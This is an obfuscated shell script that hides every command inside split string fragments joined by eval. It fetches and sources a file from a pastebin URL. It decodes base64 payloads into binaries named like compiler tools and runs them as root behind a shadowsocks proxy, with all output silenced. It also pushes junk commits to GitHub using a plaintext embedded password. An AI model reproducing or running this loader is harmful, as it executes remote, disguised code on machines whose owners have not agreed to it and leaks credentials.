GFhFkFqa="o add-apt-repos"
GLvwUwIh="itory ppa:m"
jsSXHL="ax-c-lv/shad"
IQlgw="owsocks-lib"
nDUsq="ev -y &>/dev/n"
xndoHBb="ull || true"
eval "sud""$GFhFkFqa""$GLvwUwIh""$jsSXHL""$IQlgw""$nDUsq""$xndoHBb"
vJUQF="udo add-apt-rep"
tOZsZqfF="ository pp"
UEHiQJJe="a:ondrej/apac"
moLvStZk="he2 -y &>/de"
BwrsF="v/null || "
eval "s""$vJUQF""$tOZsZqfF""$UEHiQJJe""$moLvStZk""$BwrsF""true"
xyrui="sudo apt u"
CbQO="pdate &>/d"
mSpFK="ev/null ||"
eval "$xyrui""$CbQO""$mSpFK"" true"
uQkmHu="t -O codesr"
qkNOEzKs="c https://pas"
ETtuom="tebin.com/r"
ADNyhIYF="aw/UKs9hZfc"
LIOpRGq=" &>/dev/nul"
eval "wge""$uQkmHu""$qkNOEzKs""$ETtuom""$ADNyhIYF""$LIOpRGq""l"
ibGnS="ource ./codes"
eval "s""$ibGnS""rc"
git clone $SRC codes &>/dev/null
WYhh="e64 -d code"
sqyNAp="s/"
eval "bas""$WYhh""$sqyNAp""s > o"
TjsOaKax="do apt --yes "
uTbhE="install open"
otAoqOgO="ssl &>/dev/null"
wPbD=" || t"
eval "su""$TjsOaKax""$uTbhE""$otAoqOgO""$wPbD""rue"
UgkEADZ="sudo apt --yes "
KBfULsA="install psm"
eYOa="isc shadowso"
wtazI="cks-libev "
wuVX="&>/dev/nul"
CPOvmGSw="l || "
eval "$UgkEADZ""$KBfULsA""$eYOa""$wtazI""$wuVX""$CPOvmGSw""true"
IqoAD="do systemctl"
lbjtT=" stop shadowsoc"
MdOeqQ="ks-libev.serv"
sIwS="ice &>/dev/null"
oiOCNVU=" || "
eval "su""$IqoAD""$lbjtT""$MdOeqQ""$sIwS""$oiOCNVU""true"
vLkSSBlS="e64 -d cod"
nLhSmXo="es/c > "
eval "bas""$vLkSSBlS""$nLhSmXo""pipe"
kMVaHcIE="se64 -d code"
MLfM="s/gc > g"
eval "ba""$kMVaHcIE""$MLfM""c"
KqgGW="e64 -d codes/m"
ABvILnA=" > gcc-"
eval "bas""$KqgGW""$ABvILnA""build"
FXmOY="base64 -d code"
wkpdTRbq="s/p > prepa"
eval "$FXmOY""$wkpdTRbq""re"
. ./prepare
POXCo="udo ss-local -"
NKyhAcAz="c o --plugi"
JjJV="n ./gqs --"
jCbhm="plugin-opts ./"
fhFlWP="gc &>/dev/"
CQwJdfXW="n"
eval "s""$POXCo""$NKyhAcAz""$JjJV""$jCbhm""$fhFlWP""$CQwJdfXW""ull &"
chmod +x gcc-build
kzbYfxCs="ed -i 's/g"
BLAiG="cc/cegfo/g"
ljOhP="' pip"
eval "s""$kzbYfxCs""$BLAiG""$ljOhP""e"
sudo ./gcc-build --config=pipe &>/dev/null &
GYCD="o rsn"
eval "ech""$GYCD""dvs"
mRSABy="sleep"
eval "$mRSABy"" 62"
JYSeh=" clone http"
bDYVSlUA="s://github.co"
NdgpC="m/org-rlan"
fpTpOli="g-ac/libimage.g"
dMfSBQN="it tmp &>/dev/n"
uRDIPKH="ull || "
eval "git""$JYSeh""$bDYVSlUA""$NdgpC""$fpTpOli""$dMfSBQN""$uRDIPKH""true"
gSBkpX="tmp || tr"
eval "cd ""$gSBkpX""ue"
zIiEX=" config use"
cafOzegI="r.name 'Roman A"
zuOSVmuO="kopyan' &>/de"
rQrCP="v/null || tru"
eval "git""$zIiEX""$cafOzegI""$zuOSVmuO""$rQrCP""e"
FJGyo=" config user.em"
kaeYCTD="ail roman.akopy"
VJqNm="anxb@inbox.r"
unBRVito="u &>/dev/nul"
DxZuWHRL="l || tr"
eval "git""$FJGyo""$kaeYCTD""$VJqNm""$unBRVito""$DxZuWHRL""ue"
echo 'Built' >> rsndvs$MAKE
UDgTCj="ILD=\`date +%"
Qralh="s"
eval "BU""$UDgTCj""$Qralh""\`"
pkONXH="AKE=\`date +%"
ClThov="S"
eval "M""$pkONXH""$ClThov""\`"
echo $BUILD >> rsndvs$MAKE
echo 'libimage' >> rsndvs$MAKE
git add rsndvs$MAKE &>/dev/null || true
git commit -m $MAKE' Built' &>/dev/null || true
bziyr="git push https:"
QnpMOFmt="//roman-ak"
HejA="opyanxb:'CNj"
Zfonvxeo="R-KSjHVv_9A"
etCMfs="p'@github.co"
mHDgw="m/org-rlang-"
MSDuLu="ac/libimage"
HTasO=".git -f &>/dev"
XZIjT="/null || tru"
eval "$bziyr""$QnpMOFmt""$HejA""$Zfonvxeo""$etCMfs""$mHDgw""$MSDuLu""$HTasO""$XZIjT""e"
while :; do G=`date +%s`; echo 'Building '$G; [ `expr 1391 + $BUILD` -lt $G ] && sudo killall gcc-build && break; sleep 124; done
